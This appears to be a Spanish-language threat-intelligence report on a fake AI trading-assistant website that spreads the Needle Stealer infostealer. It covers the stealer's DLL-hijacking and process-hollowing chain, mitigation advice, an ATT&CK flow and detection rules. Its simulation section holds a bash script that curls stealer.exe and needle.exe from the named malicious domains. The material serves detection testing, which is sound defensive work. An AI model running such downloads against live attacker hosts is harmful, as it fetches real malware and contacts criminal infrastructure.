Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un sitio web fraudulento que anuncia un asistente comercial impulsado por IA está siendo utilizado para propagar el infostealer Needle Stealer. La cadena de infección se basa en el secuestro de DLL y el vaciado de procesos para inyectar el malware en RegAsm.exe, ayudándolo a mezclarse con la actividad legítima del sistema. Una vez activo, el ladrón recopila datos del navegador, apunta a información de billeteras de criptomonedas y puede desplegar extensiones maliciosas del navegador para profundizar el compromiso. La comunicación con la infraestructura controlada por el atacante se maneja a través de múltiples puntos finales de API HTTP.
Investigación
Investigadores rastrearon el flujo de infección hasta un archivo ZIP descargado de tradingclaw.pro, que contenía un cargador DLL llamado iviewers.dll. Ese cargador dejó caer un DLL de segunda fase que vació RegAsm.exe y lanzó el Needle Stealer basado en Golang. Un análisis más detallado mostró que el ladrón extraía archivos ZIP ocultos que contenían extensiones maliciosas del navegador junto con un archivo de configuración que definía sus servidores de comando y control.
Mitigación
Los usuarios deben evitar descargar software de sitios web no confiables y siempre verificar las firmas del publicador antes de ejecutar cualquier instalador. Los equipos de seguridad deben auditar rutinariamente las extensiones instaladas del navegador y eliminar cualquier que parezca no autorizada o sospechosa. La monitorización de red debe configurarse para detectar tráfico hacia los dominios y direcciones IP maliciosas conocidas vinculadas a la campaña. Las herramientas de protección de endpoints también deben estar afinadas para identificar el comportamiento de secuestro de DLL y técnicas de vaciado de procesos.
Respuesta
Los defensores deben revisar la telemetría de endpoints para la ejecución de iviewers.dll y signos de inyección en RegAsm.exe. Los dominios y direcciones IP de comando y control identificados deben bloquearse a nivel de firewall o proxy. Los equipos de seguridad deben poner en cuarentena archivos que coincidan con los hashes o nombres de archivo reportados, eliminar extensiones sospechosas de %LOCALAPPDATA%PackagesExtensions, y restablecer las credenciales vinculadas a las cuentas afectadas. Cualquier billetera de criptomonedas potencialmente afectada también debe revisarse para detectar actividad no autorizada.
"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes step_a["<b>Acción</b> – <b>Inyección de Contenidos T1659</b><br/>El usuario visita el sitio malicioso de TradingClaw para obtener contenido malicioso.<br/><b>Descripción</b>: Los adversarios inyectan contenido malicioso en un sitio web legítimo para entregar payloads."] class step_a action step_b["<b>Acción</b> – <b>Enlace Malicioso T1204.001</b><br/>El usuario hace clic y descarga un archivo ZIP malicioso.<br/><b>Descripción</b>: El usuario es engañado para hacer clic en un enlace malicioso que lleva al robo de credenciales u otra descarga de payload."] class step_b action step_c["<b>Acción</b> – Múltiples técnicas<br/><b>Suplantación T1036.001</b>: iviewers.dll imita un archivo legítimo.<br/><b>Subvertir Controles de Confianza T1553.002</b>: Eludir la confianza secuestrando DLL.<br/><b>Ejecución de Proxy Binario del Sistema T1218</b>: Usar un binario del sistema para la ejecución.<br/><b>Ejecución de Proxy de Utilidades de Desarrollador de Confianza T1127</b>: Abusar de utilidades de confianza.<br/><b>Carga de Código Reflectante T1620</b>: Cargar código sin tocar el disco.<br/><b>Descripción</b>: Secuestro de DLL a través de iviewers.dll para ejecutar código malicioso."] class step_c action step_d["<b>Inyección de Proceso</b> – <b>Vaciamiento de Proceso T1055.012</b><br/>Código malicioso inyectado en el proceso de RegAsm.exe.<br/><b>Descripción</b>: El adversario crea un proceso hueco e inserta un payload malicioso."] class step_d process step_e["<b>Malware</b> – Núcleo de Needle Stealer<br/>Recopila datos de la víctima después de la ejecución."] class step_e malware step_f["<b>Acceso a Credenciales</b> – <b>Datos del Portapapeles T1115</b><br/>Recopila contenidos del portapapeles.<br/><b>Descripción</b>: Captura datos copiados al portapapeles, como contraseñas."] class step_f action step_g["<b>Captura de Entrada</b> – <b>Captura de Entrada T1056</b><br/>Captura entradas de formularios tipadas.<br/><b>Descripción</b>: Registra pulsaciones de teclas o campos de formularios para robar credenciales."] class step_g action step_h["<b>Acceso a Credenciales</b> – Múltiples técnicas<br/><b>Descubrimiento de Información del Navegador T1217</b>: Enumera los navegadores instalados.<br/><b>Credenciales de Navegadores Web T1555.003</b>: Extrae contraseñas guardadas.<br/><b>Cookie de Sesión Web T1550.004</b>: Lee cookies de sesión.<br/><b>Robo de Cookie de Sesión Web T1539</b>: Exfiltra cookies.<br/><b>Forjar Credenciales Web T1606</b>: Crea credenciales falsificadas.<br/><b>Descripción</b>: Roba datos del navegador, credenciales y cookies."] class step_h action step_i["<b>Persistencia</b> – <b>Extensiones de Software T1176</b><br/>Instala una extensión del navegador maliciosa.<br/><b>Descripción</b>: La extensión persiste en el navegador y puede modificar el tráfico."] class step_i action step_j["<b>Acción</b> – La extensión manipula el tráfico<br/>Redirige peticiones, reemplaza descargas, inyecta scripts."] class step_j action step_k["<b>Comando y Control</b> – Múltiples técnicas<br/><b>Codificación de Datos T1132.001</b>: Codificar datos antes de la exfiltración.<br/><b>Exfiltración a través del Canal C2 T1041</b>: Envía datos a través de C2.<br/><b>Descripción</b>: Comunica datos robados a un servidor remoto."] class step_k action %% Connections step_a –>|leads_to| step_b step_b –>|leads_to| step_c step_c –>|leads_to| step_d step_d –>|leads_to| step_e step_e –>|collects| step_f step_e –>|collects| step_g step_e –>|collects| step_h step_e –>|installs| step_i step_i –>|enables| step_j step_j –>|communicates| step_k "
Flujo de Ataque
Detecciones
Posible Intento de Carga Lateral de DLL Usando Oleview (vía image_load)
Ver
Comando y Control Sospechoso por Solicitud de DNS con Dominio de Nivel Superior (TLD) Inusual (vía dns)
Ver
IOCs (HashSha256) para detectar: Sitio web comercial malicioso deja malware que entrega su navegador a atacantes
Ver
IOCs (IP Fuente) para detectar: Sitio web comercial malicioso deja malware que entrega su navegador a atacantes
Ver
IOCs (IP Destino) para detectar: Sitio web comercial malicioso deja malware que entrega su navegador a atacantes
Ver
Detección de Sitios Maliciosos de TradingClaw y Redireccionamientos [Servidor Web]
Ver
Ejecución de Simulación
Requisito previo: La Verificación Previa de Telemetría y Línea Base debe haber pasado.
Fundamento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa de Ataque y Comandos:
Un adversario que ha obtenido el malware Needle Stealer lo aloja en el dominio maliciosotradingclaw.pro. El atacante persuade a una víctima para que abra un enlace malicioso (e.g., a través de un phishing por email). El navegador de la víctima realiza una solicitud HTTP GET ahttp://tradingclaw.pro/stealer.exe, que los registros del proxy registran. Debido a que la URL contiene la cadena exactatradingclaw.pro, la condición de la regla Sigma (url|contains) se evalúa como verdadera, generando una alerta.Para replicar esto en un entorno de prueba, emitimos un
curldirecto al dominio malicioso. La solicitud está diseñada para parecer tráfico típico de usuario (User-Agent estándar, sin cabeceras especiales) para que solo la coincidencia de dominio impulse la alerta. -
Script de Prueba de Regresión:
#!/usr/bin/env bash # ------------------------------------------------------------ # Simular acceso malicioso para activar la regla de detección "TradingClaw Malicioso" # ------------------------------------------------------------ set -euo pipefail # Definir las URLs maliciosas (cadenas exactas usadas por la regla) MALICIOUS_URLS=( "http://tradingclaw.pro/stealer.exe" "https://studypages.com/download/needle.exe" ) for url in "${MALICIOUS_URLS[@]}"; do echo "[*] Solicitando ${url}" # Usar un user-agent realista para imitar un navegador curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0 Safari/537.36" -s -o /dev/null "${url}" done echo "[+] Simulación completada." -
Comandos de Limpieza:
# No se crean artefactos persistentes mediante las solicitudes curl. # Vaciar la caché DNS para evitar la reutilización accidental del dominio en pruebas posteriores. if command -v ipconfig >/dev/null 2>&1; then ipconfig /flushdns elif command -v systemd-resolve >/dev/null 2>&1; then systemd-resolve --flush-caches fi echo "[+] Limpieza completada."
Fin del Informe